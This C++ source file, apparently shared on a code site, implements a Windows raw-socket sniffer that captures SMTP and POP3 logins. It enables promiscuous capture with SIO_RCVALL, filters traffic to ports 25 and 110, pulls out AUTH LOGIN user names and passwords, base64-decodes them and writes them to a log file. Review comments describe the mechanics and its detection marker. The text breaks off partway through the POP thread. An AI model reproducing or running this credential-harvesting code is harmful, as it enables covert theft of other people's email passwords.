
📄 sniffer.cpp

📁 Sniffer using Sock_raw. 挺不错的。
////////////////////////////////////////////////////////////////////////////////////
//                             Raw Sniffer Code  V1.0                             //
//                        powered by shadow @2004/10/4                            //
//                   my web:http://www.codehome.6600.org                          //
////////////////////////////////////////////////////////////////////////////////////

#include "stdafx.h"
#include "SNIFFER.h"
#include "BASE641.h"
#pragma comment(lib,"wsock32.lib")
//
// Session parameters shared by the capture code in this file.
// Fields without a comment carried none in the original; their exact meaning
// is not established by the code visible here.
// NOTE(review): LPUSERINFO is declared as a second name for the struct itself,
// not as a pointer to it, despite the LP prefix.
typedef struct _USERINFO{  // parameter information structure
CString ProtoType;
CString sourceip;
CString sourceport;
CString destip;
CString destport;
int SelfSnifferStartFlag;  
int SnifferStartFlag;      
int Way;                   // sniffing mode: 1 = one-way, 0 = two-way
char SnifferDataPath[MAX_PATH];    // output path for SMTP and POP sniffing
char SelfSnifferDataPath[MAX_PATH];// output path for custom sniffing
int MaxData;               // maximum record size, unit "M" (presumably megabytes)
}USERINFO,LPUSERINFO;
//
// File-scope state. Several of these globals are read and written by the worker
// threads defined below with no lock visible in this file.
USERINFO userinfo;
SOCKET RawSocket; 
FILE *fsniffer;
int BasePort;              // incremented by each worker thread before it binds its socket
CString SmtpListenIpList[MAX_SUBTHREAD_NUM];       // addresses currently being listened for (SMTP)
CString PopListenIpList[MAX_SUBTHREAD_NUM];        // addresses currently being listened for (POP)
CString ListenSmtpIp; // temporary listen IP, copied by a new SMTP worker thread at start-up
CString ListenPopIp;  
CString PopServerIp;  // POP server IP
int SubThreadIdList[MAX_SUBTHREAD_NUM*2];   // sub-thread id list; 0 marks a free slot
// Maps an IP protocol number to its display text.
// Returns one of the IPPROTO_*_TXT values; any protocol other than
// TCP, UDP, ICMP or IGMP yields IPPROTO_DEFAULT_TXT.
char * GetProtocol(unsigned char proto){
   if(proto==IPPROTO_TCP)  return IPPROTO_TCP_TXT;
   if(proto==IPPROTO_UDP)  return IPPROTO_UDP_TXT;
   if(proto==IPPROTO_ICMP) return IPPROTO_ICMP_TXT;
   if(proto==IPPROTO_IGMP) return IPPROTO_IGMP_TXT;
   return IPPROTO_DEFAULT_TXT;
}

 //check ip if is listened
// Returns true when ip equals one of the entries in SmtpListenIpList.
bool SmtpIpIsListened(CString ip){
  int slot=0;
  while(slot<MAX_SUBTHREAD_NUM){
     if(SmtpListenIpList[slot].Compare(ip)==0) return true;
     ++slot;
  }
  return false;
}

// Returns true when ip equals one of the entries in PopListenIpList.
bool PopIpIsListened(CString ip){
  int slot=0;
  while(slot<MAX_SUBTHREAD_NUM){
     if(PopListenIpList[slot].Compare(ip)==0) return true;
     ++slot;
  }
  return false;
}

// Stores ip in the first empty slot of SmtpListenIpList.
// Returns true on success, false when every slot is occupied.
bool InsertSmtpListenIpList(CString ip){
    for(int slot=0;slot<MAX_SUBTHREAD_NUM;++slot){
        if(!SmtpListenIpList[slot].IsEmpty()) continue;   // slot in use
        SmtpListenIpList[slot]=ip;
        return true;
    }
    return false;
}
// Stores ip in the first empty slot of PopListenIpList.
// Returns true on success, false when every slot is occupied.
bool InsertPopListenIpList(CString ip){
    for(int slot=0;slot<MAX_SUBTHREAD_NUM;++slot){
        if(!PopListenIpList[slot].IsEmpty()) continue;   // slot in use
        PopListenIpList[slot]=ip;
        return true;
    }
    return false;
}

// Clears the first SmtpListenIpList entry equal to ip.
// Returns true when an entry was cleared, false when ip was not found.
bool DeleteSmtpListenIp(CString ip){
    for(int slot=0;slot<MAX_SUBTHREAD_NUM;++slot){
        if(SmtpListenIpList[slot].Compare(ip)!=0) continue;
        SmtpListenIpList[slot].Empty();   // an empty string marks the slot as free
        return true;
    }
    return false;
}
// Clears the first PopListenIpList entry equal to ip.
// Returns true when an entry was cleared, false when ip was not found.
bool DeletePopListenIp(CString ip){
    for(int slot=0;slot<MAX_SUBTHREAD_NUM;++slot){
        if(PopListenIpList[slot].Compare(ip)!=0) continue;
        PopListenIpList[slot].Empty();   // an empty string marks the slot as free
        return true;
    }
    return false;
}
// Records threadid in the first free (zero) slot of SubThreadIdList.
// Returns true on success, false when no free slot was found.
// NOTE(review): SubThreadIdList is declared with MAX_SUBTHREAD_NUM*2 slots but
// only the first MAX_SUBTHREAD_NUM are scanned here - confirm which bound is intended.
bool InsertSubThreadIdList(int threadid){
    int slot=0;
    while(slot<MAX_SUBTHREAD_NUM&&SubThreadIdList[slot]!=0) ++slot;
    if(slot==MAX_SUBTHREAD_NUM) return false;
    SubThreadIdList[slot]=threadid;
    return true;
}

// Frees the first SubThreadIdList slot holding threadid by resetting it to 0.
// Returns true when a slot was freed, false when threadid was not found.
bool DeleteSubThreadId(int threadid){
    int slot=0;
    while(slot<MAX_SUBTHREAD_NUM&&SubThreadIdList[slot]!=threadid) ++slot;
    if(slot==MAX_SUBTHREAD_NUM) return false;
    SubThreadIdList[slot]=0;
    return true;
}

// Thread message notification: posts msg to every thread id registered in
// SubThreadIdList. Returns 0, or 14 when posting raised a C++ exception.
// NOTE(review): PostThreadMessage reports failure through its return value,
// which is not inspected here.
int MessageSubThread(unsigned int msg){
    int result=0;
    for(int slot=0;slot<MAX_SUBTHREAD_NUM;++slot){
        if(SubThreadIdList[slot]==0) continue;   // free slot, nothing to notify
        try{
            PostThreadMessage(SubThreadIdList[slot],msg,NULL,NULL);
        }
        catch(...){
            result=14;
        }
    }
    return result;
}
//
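// Reads one datagram from a raw IP socket and returns its payload as text.
//
//   listensocket  raw socket to read from
//   listenip      dotted-quad source address the packet must carry
//   ToPort        decimal destination port the packet must carry
//
// Returns the payload (for ICMP, prefixed with type and code) when the packet's
// source address equals listenip and its destination port equals ToPort.
// Returns the literal "no data" when recv fails, when the packet is shorter than
// its headers claim, or when it does not match the filter.
// The payload is formatted with %s, so it stops at the first NUL byte.
//
// Every length used below comes from the wire and is checked against the number
// of bytes actually received before a pointer is derived from it.
CString GetSnifferData(SOCKET listensocket,CString listenip,CString ToPort){
   // Largest IPv4 datagram plus one byte that recv never writes, so the text
   // handed to %s is always NUL-terminated inside the buffer.
   char buffer[65535+1];
   const int MinIpHeaderLen=20;    // IHL of 5 words: smallest legal IPv4 header
   const int MinTcpHeaderLen=20;   // data offset of 5 words: smallest legal TCP header
   int readnum,HeaderLen,TransportLen,Remaining;
   IP_HEADER *IpHeader;
   TCP_HEADER *TcpHeader;
   UDP_HEADER *UdpHeader;
   ICMP_HEADER *IcmpHeader;
   CString FromIp,FromPort,DestPort,PacketData;
   char *pdata;

   PacketData="no data";
   ZeroMemory(buffer,sizeof(buffer));
   readnum=recv(listensocket,buffer,(int)sizeof(buffer)-1,0);
   if(readnum==SOCKET_ERROR||readnum<(int)sizeof(IP_HEADER)) return PacketData;

   IpHeader=(IP_HEADER *)buffer;
   HeaderLen=(IpHeader->VersionHdl&0x0f)*4;
   if(HeaderLen<MinIpHeaderLen||HeaderLen>readnum) return PacketData;
   Remaining=readnum-HeaderLen;    // bytes available for the transport header and payload

   FromIp.Format("%d.%d.%d.%d",IpHeader->FromIP.address[0],IpHeader->FromIP.address[1],IpHeader->FromIP.address[2],IpHeader->FromIP.address[3]);

   switch(IpHeader->Protocol){
      case IPPROTO_ICMP:
         if(Remaining<(int)ICMP_HEADER_LEN) return PacketData;
         IcmpHeader=(ICMP_HEADER *)(buffer+HeaderLen);
         FromPort.Format("-");
         DestPort.Format("-");
         pdata=(char *)IcmpHeader+ICMP_HEADER_LEN;
         PacketData.Format("type:%d code:%d data:%s",IcmpHeader->Type,IcmpHeader->Code,pdata);
         break;
      case IPPROTO_UDP:
         if(Remaining<(int)UDP_HEADER_LEN) return PacketData;
         UdpHeader=(UDP_HEADER *)(buffer+HeaderLen);
         FromPort.Format("%d",ntohs(UdpHeader->FromPort));
         DestPort.Format("%d",ntohs(UdpHeader->ToPort));
         pdata=(char *)UdpHeader+UDP_HEADER_LEN;
         PacketData.Format("%s",pdata);
         break;
      case IPPROTO_TCP:
         if(Remaining<(int)sizeof(TCP_HEADER)) return PacketData;
         TcpHeader=(TCP_HEADER *)(buffer+HeaderLen);
         TransportLen=((TcpHeader->HeaderLen)>>4)*4;
         // A data offset below the fixed header or past the received bytes would
         // place pdata outside the packet.
         if(TransportLen<MinTcpHeaderLen||TransportLen>Remaining) return PacketData;
         FromPort.Format("%d",ntohs(TcpHeader->FromPort));
         DestPort.Format("%d",ntohs(TcpHeader->ToPort));
         pdata=(char *)TcpHeader+TransportLen;
         PacketData.Format("%s",pdata);
         break;
      default:
         // Other protocols carry no port and were always reported as "no data".
         return PacketData;
      }

   if(FromIp.Compare(listenip)==0&&DestPort.Compare(ToPort)==0) return PacketData;
   PacketData="no data";
   return PacketData;
}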
// Appends one SMTP record (user name, password, MAIL FROM line, RCPT TO line)
// to filename, opened in binary append mode. The record is stored as plain text.
// Prints a message and writes nothing when the file cannot be opened.
void WriteSMTPSniffer(char *filename,CString username,CString password,CString mailfrom,CString mailto){
    FILE *out=fopen(filename,"ab+");
    if(out==NULL){
        printf("File can not create...\r\n");
        return;
    }
    CString banner="\r\n-----------------SMTP嗅探------------------\r\n";
    CString record="用户名:"+username+"\r\n密码:"+password+"\r\n"+mailfrom+"\r\n"+mailto;
    fputs(banner,out);
    fputs(record,out);
    fclose(out);
}
// Appends one POP record (user name, password, POP server IP) to filename,
// opened in binary append mode. The record is stored as plain text.
// Prints a message and writes nothing when the file cannot be opened.
void WritePOPSniffer(char *filename,CString username,CString password,CString pop){
    FILE *out=fopen(filename,"ab+");
    if(out==NULL){
        printf("File can not create...\r\n");
        return;
    }
    CString banner="\r\n-----------------POP嗅探------------------\r\n";
    CString record="用户名:"+username+"\r\n密码:"+password+"\r\nPOP IP:"+pop;
    fputs(banner,out);
    fputs(record,out);
    fclose(out);
}
// SMTP login sniffing thread.
//
// Worker-thread entry point; param is not used. The thread registers its id,
// opens a raw IP socket bound to the first local address with SIO_RCVALL
// enabled, and then reads packets through GetSnifferData, keeping only those
// whose source address is the value copied from ListenSmtpIp and whose
// destination port is "25". From that client-to-server stream it records the
// MAIL FROM and RCPT TO lines and the two lines that follow AUTH LOGIN.
// When both credential lines were seen they are base64-decoded and appended to
// userinfo.SnifferDataPath via WriteSMTPSniffer.
//
// Returns 0 on normal exit, or 4 (socket), 5 (setsockopt), 7 (bind),
// 8 (SIO_RCVALL) when set-up fails.
//
// AUTH LOGIN transmits the user name and password base64-encoded, which is an
// encoding and not encryption; the cleartext this routine depends on is absent
// when the session is carried over TLS. A raw socket with SIO_RCVALL enabled
// is the observable marker of this kind of capture on a Windows host.
UINT SmtpSnifferThread(LPVOID param){
//
MSG msg;
int ErrorCode;
CString SnifferStr;
CString ListenIp,toport;
bool SMTPSTART;
bool SMTPAUTHLOGIN;
int  SMTP_LOGIN_STEP;
bool SMTPDATASTART;
bool GetMailOK;
CString MailFrom,MailTo,UserName,PassWord,MailData,AllString;
SMTPSTART=true;
SMTPAUTHLOGIN=false;
SMTPDATASTART=false;
GetMailOK=false;
// Sentinel texts; a field still holding its sentinel has not been captured.
MailFrom="no get mailfrom";
MailTo="no get mailto";
UserName="no get username";
PassWord="no get password";
MailData="no get maildata";
int this_threadid=GetCurrentThreadId();
InsertSubThreadIdList(this_threadid);
// NOTE(review): ListenSmtpIp and BasePort (below) are globals accessed here
// with no lock visible in this file - confirm how the creator serializes them.
ListenIp=ListenSmtpIp;
toport="25";
//set rawsock to listen
SOCKET SmtpSocket;
SmtpSocket=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(SmtpSocket==INVALID_SOCKET){
  ErrorCode=4;
  DeleteSmtpListenIp(ListenIp);
  DeleteSubThreadId(this_threadid);
  return ErrorCode;
  }
// NOTE(review): the three error returns below leave SmtpSocket open.
int rcvtimeout=5000;
if(setsockopt(SmtpSocket,SOL_SOCKET,SO_RCVTIMEO,(const char *)&rcvtimeout,sizeof(rcvtimeout))==SOCKET_ERROR){
  ErrorCode=5;
  DeleteSmtpListenIp(ListenIp);
  DeleteSubThreadId(this_threadid);
  return ErrorCode;
  }
char hostname[100];
char *hostip;
hostent *myhost;
sockaddr_in localsock;
// NOTE(review): neither gethostname nor gethostbyname is checked; a NULL
// result from gethostbyname is dereferenced on the line after it.
gethostname(hostname,100);
myhost=gethostbyname(hostname);
hostip=inet_ntoa(*(in_addr *)myhost->h_addr_list[0]);
localsock.sin_family=AF_INET;
localsock.sin_port=htons(++BasePort);
localsock.sin_addr.S_un.S_addr=inet_addr(hostip);
if(bind(SmtpSocket,(const sockaddr *)&localsock,sizeof(localsock))==SOCKET_ERROR){
  ErrorCode=7;
  DeleteSmtpListenIp(ListenIp);
  DeleteSubThreadId(this_threadid);
  return ErrorCode;
  }
// SIO_RCVALL asks the stack to deliver all IP packets seen on the bound
// interface; Windows grants it only to administrators.
DWORD dwValue=1;
if(ioctlsocket(SmtpSocket,SIO_RCVALL,&dwValue)==SOCKET_ERROR){
   ErrorCode=8;
   DeleteSmtpListenIp(ListenIp);
   DeleteSubThreadId(this_threadid);
   return ErrorCode;
   }
//
// NOTE(review): the concatenated string is passed as the printf format itself.
printf("\r\n"+ListenIp+":sub thread smtp sniffer start!try to sniffer data...\r\n");
while(true){  
     // A WM_SNIFFER_CLOSE message posted to this thread ends the loop.
     // NOTE(review): the socket is closed here and again after the loop.
     if(PeekMessage(&msg,NULL,WM_SNIFFER_CLOSE,WM_SNIFFER_CLOSE,PM_REMOVE)){
        closesocket(SmtpSocket);
		TRACE("subthread  close ok!");
	    break;
	    }
     SnifferStr=GetSnifferData(SmtpSocket,ListenIp,toport);	
	 if(SnifferStr.Compare("no data")==0){
       Sleep(2);	   
	   continue;
	   }
     int index;
     CString LowSnifferStr;
	 LowSnifferStr=SnifferStr;
	 LowSnifferStr.MakeLower();	
     // Commands are matched case-insensitively at the start of the payload;
     // the captured text is cut at the first CRLF.
     if(SMTPSTART){
	    if(index=LowSnifferStr.Find("mail from:",0)==0){
		   if(index=SnifferStr.Find("\r\n",0)){
		       if(MailFrom=="no get mailfrom") MailFrom=SnifferStr.Mid(0,index);
			   }
		   }
	    else if(index=LowSnifferStr.Find("rcpt to:",0)==0){
		   if(index=SnifferStr.Find("\r\n",0)){
		       if(MailTo=="no get mailto") MailTo=SnifferStr.Mid(0,index);
			   }
		   SMTPSTART=false;
	       TRACE("get last data!\r\n");
	       GetMailOK=true;
		   break;
		   }
		// After AUTH LOGIN was seen, the next payloads reaching this branch are
		// taken as user name (step 1) and password (step 2), still base64 text.
		else if(SMTPAUTHLOGIN){
		   if(SMTP_LOGIN_STEP==1){
		      if(index=SnifferStr.Find("\r\n",0)){
			     if(UserName=="no get username") UserName=SnifferStr.Mid(0,index);
				 }
			  SMTP_LOGIN_STEP=2;
			  continue;
			  }
		   if(SMTP_LOGIN_STEP==2){
		      if(index=SnifferStr.Find("\r\n",0)){
			     if(PassWord=="no get password") PassWord=SnifferStr.Mid(0,index);
				 }
			  SMTPAUTHLOGIN=false;
			  }
		   }
		/*
		if(index=LowSnifferStr.Find("data",0)==0){
		   SMTPDATASTART=true;
		   TRACE("listen data ok!\r\n");
		   continue;
		   }
		*/
		else if(index=LowSnifferStr.Find("auth login",0)==0){
		   SMTPAUTHLOGIN=true;
		   SMTP_LOGIN_STEP=1;
		   }
		/*
		if(SMTPDATASTART){
			if(index=SnifferStr.Find("\r\n.\r\n",0)){
			   MailData+=SnifferStr.Mid(0,index);
			   SMTPDATASTART=false;
			   TRACE(MailData+"get mail data ok!\r\n");
			   continue;
			   }
			else{
			   MailData+=SnifferStr;
			   continue;
			   }			
			}
		*/
        else if(index=LowSnifferStr.Find("quit",0)==0){
		    SMTPSTART=false;
			TRACE("get last data!\r\n");
			GetMailOK=true;
			break;
		    }				
		}
	Sleep(1);
	}
// Decode and store the record only when both credential lines were captured.
if(GetMailOK&&UserName!="no get username"&&PassWord!="no get password"){
 BASE64 base64;
 char enusername[50];
 char enpassword[50];
 // NOTE(review): the standard ZeroMemory macro takes (destination, length);
 // this three-argument form presumably depends on a project redefinition - confirm.
 ZeroMemory(enusername,0,50);
 ZeroMemory(enpassword,0,50);
 // Values of 50 characters or more are left undecoded so they cannot overrun
 // the 50-byte scratch buffers.
 // NOTE(review): a CString object is passed through the sprintf varargs for %s.
 if(UserName!="no get username"&&UserName.GetLength()<50){
    sprintf(enusername,"%s",UserName);
	UserName.Format("%s",base64.StringDecode((unsigned char *)enusername));
	}
 if(PassWord!="no get password"&&PassWord.GetLength()<50){
    sprintf(enpassword,"%s",PassWord);
	PassWord.Format("%s",base64.StringDecode((unsigned char *)enpassword));
	}
 AllString=UserName+"\r\n"+PassWord+"\r\n"+MailFrom+"\r\n"+MailTo;
 // NOTE(review): AllString holds text taken from the network and is used as the
 // printf format string, so any % sequence in the traffic is interpreted.
 printf("This is listen:\r\n"+AllString);
 WriteSMTPSniffer(userinfo.SnifferDataPath,UserName,PassWord,MailFrom,MailTo);
 }
closesocket(SmtpSocket);
Sleep(1000);
// Release this thread's table entries so the address can be listened for again.
DeleteSmtpListenIp(ListenIp);
DeleteSubThreadId(this_threadid);
TRACE("\r\nsub thread exit!");
return 0;
}


//POP3登陆嗅探线程
UINT PopSnifferThread(LPVOID param){

MSG msg;
int ErrorCode;
CString SnifferStr;
CString ListenIp,PopIp,toport;
bool POPSTART;
bool GetMailOK;
CString UserName,PassWord,AllString;
ListenIp=ListenPopIp;
PopIp=PopServerIp;
POPSTART=true;
GetMailOK=false;
UserName="no get username";
PassWord="no get password";
int this_threadid=GetCurrentThreadId();
InsertSubThreadIdList(this_threadid);
toport="110";
//set rawsock to listen
SOCKET POPSocket;
POPSocket=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(POPSocket==INVALID_SOCKET){
  ErrorCode=4;
  DeletePopListenIp(ListenIp);
  DeleteSubThreadId(this_threadid);
  return ErrorCode;
  }
int rcvtimeout=5000;
if(setsockopt(POPSocket,SOL_SOCKET,SO_RCVTIMEO,(const char *)&rcvtimeout,sizeof(rcvtimeout))==SOCKET_ERROR){
  ErrorCode=5;
  DeletePopListenIp(ListenIp);
  DeleteSubThreadId(this_threadid);
  return ErrorCode;
  }
char hostname[100];
char *hostip;
hostent *myhost;
sockaddr_in localsock;
